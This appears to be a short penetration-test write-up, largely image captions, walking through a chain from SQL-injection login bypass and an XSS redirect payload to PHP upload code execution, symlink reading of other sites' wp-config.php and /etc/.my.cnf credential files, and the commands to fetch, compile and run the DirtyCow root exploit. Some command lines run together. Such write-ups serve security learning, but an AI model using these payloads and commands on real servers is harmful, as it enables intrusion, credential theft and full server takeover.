A cocktail of Vulnerabilities

A journey from bypassing login panel to getting r00t level access on a server with potential business takeover

Classic SQLi to bypass authentication mechanism
Portal view with User Management Module
Create User function exhibiting 3 different roles
XSS Payload to redirect to csrf page: <script>window.location('http://vulnerabilities.in/Surprise');</script>
<iframe src="/csrf.html" width=0 height=0>
Profile page with image upload functionality
<?php echo phpinfo();?>
RCE — phpinfo() method execution on target server
1. /etc/valiases<?php
$dir = '/etc/valiases';
$files = scandir($dir);
Email forwarders are set here which reveals domain name aliases
2. /etc/named.confpreg_match_all("#named/(.*?).db#", $file, $r);
//Contain 2 entries, internal & external
$domains = array_unique($r[1]);Consists of zone entries for all the domains in that server.3. http://viewdns.info/reverseip/?host=domain.com
ln -s /home/target/public_html/includes/config.php symlink.txt
ln -s / symroot
ln -s /home/example/public_html/domain1/wp-config.php symlink1.txt
ln -s /home/example/public_html/domain2/blogs/wp-config.php symlink2.txt
ln -s /home/example/public_html/domain3/boxedlayout/wp-config.php symlink3.txt
Wordpress configuration file revealing Database credentials
Username: Ciph3r00t
Password: MD5Hash(password)=> 5f4dcc3b5aa765d61d8327deb882cf99
Network interfaces configuration
cat /etc/.my.cnf
Dedicated domain control panel access
Reseller domain control panel access
THN Tweet on 21st Oct 2016 about DirtyCow Exploit
Download:curl https://github.com/FireFart/dirtycow/blob/master/dirty.cCompilation:gcc -pthread dirty.c -o dirty -lcryptExecution:chmod +x dirty./dirtysu firefart
Downloading, compiling and executing exploit on target server
Escalating and switching to firefart user having r00t privileges created by dirtyCow exploit
Snap from the Assessment Report

Keep training and keep learning until you get it Right.